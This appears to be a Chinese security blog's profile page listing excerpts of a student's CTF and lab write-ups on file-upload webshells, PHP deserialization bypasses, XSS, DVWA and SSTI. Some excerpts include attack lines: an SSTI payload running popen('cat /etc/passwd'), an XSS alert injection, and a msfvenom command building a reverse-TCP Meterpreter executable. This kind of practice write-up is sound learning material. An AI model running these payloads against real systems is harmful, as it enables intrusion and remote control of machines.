- 博客(19)
- 收藏
- 关注
原创 [WUSTCTF2020]CV Maker1
进来是个华丽的界面,我们先跟随这个网页创造一个用户。发现了一个上传端口,尝试上传一个php文件并抓包。传入 并且报告了 上传路径,然后使用蚁剑连接。直接上传进不去,加个GIF89A。
2025-04-05 18:41:56
206
原创 DVWA靶场通关
Sniper: 单参数爆破,多参数时使用同一个字典按顺序替换各参数,只有一个数据会被替换Battering ram: 多参数同时爆破,但用的是同一个字典,每个参数数据都是一致的Pichfork: 多参数同时爆破,但用的是不同的字典,不同字典间数据逐行匹配Cluster bamb: 多参数做笛卡尔乘积模式爆破。
2025-02-11 17:33:18
1806
原创 第四次培训
同样用上一关的代码,发现显示在var username处,这里\把一个单引号转义了,那么只需要再加一个即可,也就是username=xss'';alert(1);//
2025-01-26 18:19:46
262
原创 第一次培训
code题目的标题叫做反序列化,给了?code,那我们尝试把这个对象先给序列化,但是我们发现存在wakeup魔术,这个魔术是在反序列化的时候触发,那么我们要绕开他,这里有一个知识点,php版本漏洞产生原因:如果存在_wakeup()方法,调用unserialize()方法前则先调用_wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时,会跳过_wakeup()的执行那么我们构造payload:?s:3:"111";
2025-01-17 21:36:24
776
原创 第二次培训
接下来是is_valid函数,其中含有一个参数$s,接下来是一个for循环,is_valid()方法规定传入变量的字符的ASCII码必须是32-125,而变量是protected定义的,protected属性在序列化后会出现不可见字符\x00*\x00,转化为ASCII码不符合要求,而public属性序列化不会出现不可见字符,可以用public属性来绕过,发现了flag.php,index.php,class.php三个文件,flag.php文件中什么也没有,接下来代码审计两个文件的代码,
2025-01-17 18:05:49
722
原创 JSP语法
JSP(JavaServer Pages)是一种用于构建动态Web页面的技术,它允许Java代码嵌入到HTML中。1.指令 指令用于控制JSP页面的整体行为,如页面的属性,包含的文件等。动作元素用于控制JSP页面的行为,如包含文件,转发请求,使用JavaBeans等,JSTL是一组标准的标签库,用于简化JSP页面的开发。jsp:getProperty:用于获取JavaBean的属性值。jsp:setProperty:用于设置JavaBean的属性。include指令:用于在JSP页面中包含其他文件。
2025-01-15 14:14:01
252
原创 [SWPUCTF 2021 新生赛]ez_unserialize
s:3:"ctf";这与robots协议文件很像,尝试访问一下,进去发现给到一个文件。进入后发现没有没有直接给到我们任何的信息,我们先去找一下源码。/cl45s.php 再访问一下,出现了源码。关于魔术的介绍可以看前面几个文章。看一下本页面的源码,发现提示。
2025-01-12 21:55:55
158
原创 [SWPUCTF 2022 新生赛]ez_ez_unserialize
这是因为 PHP 在反序列化过程中,会根据序列化字符串中指定的属性个数来处理对象的属性。如果指定的属性个数大于实际的属性个数,PHP 会认为对象的属性已经完整,从而跳过。:定义了一个公共属性 $x,默认值为当前文件的路径(__FILE__ 是一个魔术常量,表示当前文件的完整路径)。在 PHP 中,当序列化字符串中表示对象属性个数的值大于实际属性个数时,可以绕过。是一个构造方法,用于在创建对象时初始化对象的状态。它用于执行一些在对象反序列化后需要进行的操作。它用于执行一些在对象销毁前需要进行的操作。
2025-01-12 20:59:34
174
原创 [SWPUCTF 2022 新生赛]1z_unserialize
这边新定义一个nss或者是new一个lyh对象的话,就会触发destruct的代码内容,然后在其中加入cat /flag查看flag代码。
2025-01-12 18:18:50
250
原创 ssti模板注入
{{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /etc/passwd').read()}}{{".__class__.__base__.__subclasses__()[117].__init__.__globals__}} 查看全部全局变量,有哪些可以使用的方法函数等。使用Jinjia2中的"~"进行拼接:{%set a="__cla"%}{%set b="ss__"%}{{a~b}}
2024-12-21 18:13:33
919
原创 [SUCTF 2019]Pythonginx1
uWSGI(发音为 "microservice")是一个应用程序容器,它可以用来运行任何语言编写的应用程序,包括但不限于Python、Ruby、PHP、Lua和Java。uWSGI以其轻量级、快速和模块化的特点而闻名,它提供了一个轻量级的替代方案,用于传统的重型应用服务器(如Apache HTTP Server或Nginx)。此外,代码中的注释和格式化已经添加,以提高代码的可读性。这个配置文件是Web应用部署中常见的Nginx配置,用于将Web请求转发到后端应用服务器,并处理静态文件的请求。
2024-12-19 22:57:49
959
原创 一些常见的网页报错
416——请求中包含Range请求头字段,在当前请求资源范围内没有range指示值,请求也不包含If-Range请求头字段。417——服务器不满足请求Expect头字段指定的期望值,如果是代理服务器,可能是下一级服务器不能满足请求。411——服务器拒绝用户定义的Content-Length属性请求。406——根据用户发送的Accept拖,请求资源不可访问。505——服务器不支持或拒绝支请求头中指定的HTTP版本。414——请求的资源URL长于服务器允许的长度。305 请求的资源必须从服务器指定的地址得到。
2024-12-15 22:59:04
162
原创 远控木马的简单使用
msfvenom 的主要作用包括生成自定义的 Payloads、生成漏洞利用代码,并且支持多种不同平台和架构,如 Windows、Linux、Android 等。配置的LHOST=192.168.9.151和LPORT=4444,IP地址和端口需要和msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.9.151 lport=4444 -f exe -o test.exe保持一致,为kali的IP地址和端口。
2024-12-04 20:02:12
934
原创 Docker系列使用以及ipanel控制面板
docker exec -it 容器名 bash 容器管理 一般是不进入到容器内部,除非是需要修改内部的一些错误。为了更直观化的看到,我们可以在kali里安装ipanel控制面板然后ipanel网站访问。-dit后台运行 --name安装之后的容器名称 10000开放的容器端口。docker的基础操作-运行镜像(把镜像安装成容器)docker-compose 自动化管理容器。换源或者是挂梯子或者是使用特定的加速器。docker images查看镜像。docker ps -a查看容器。
2024-12-04 17:45:14
283
原创 第三次培训
XSS(Cross-Site Scripting,跨站脚本攻击)是一种网络安全漏洞,它允许攻击者将恶意脚本注入到其他用户会访问的页面中。这种攻击通常发生在攻击者利用网站对用户输入的验证和过滤不严格时,将恶意代码注入到网页中,当其他用户访问这些页面时,恶意脚本就会在用户的浏览器上执行。存储型XSS(Persistent XSS):攻击者的脚本被存储在目标服务器上,例如在数据库、消息论坛、访客留言等地方。当其他用户访问这些页面时,脚本就会被执行。反射型XSS(Non-Persistent XSS)
2024-11-23 16:50:10
2009
原创 一二周学习的知识点
是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。Unix、Linux系统或者是任何版本的Apache Web服务器都是支持.htaccess的,但是有的主机服务商可能不允许你自定义自己的.htaccess文件。
2024-10-24 23:50:28
854
原创 php搭建文件上传靶场漏洞
方法二:将该目录及其子目录的所有文件因均映射为php文件类型,除了这个方法之外,我们尝试观察源代码通过它的逻辑来修改文件后缀到达上传的目的,我们上传php文件并且抓包修改文件后缀名为. .进行上传,他的原理是windows系统会自动去除文件末尾的句号和空格,发现上传成功,接着用蚁剑进行连接,记得把文件最后面的.进行删除,发现连接成功。那么接下来通过蚁剑打开连接即可。通关页面打开一句话木马的路径发现上传成功,接下来试试蚁剑能不能连接登录,发现不能登陆,尝试把文件名的空格去掉试试,也不行,什么原因呢?
2024-10-24 12:23:08
1918
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人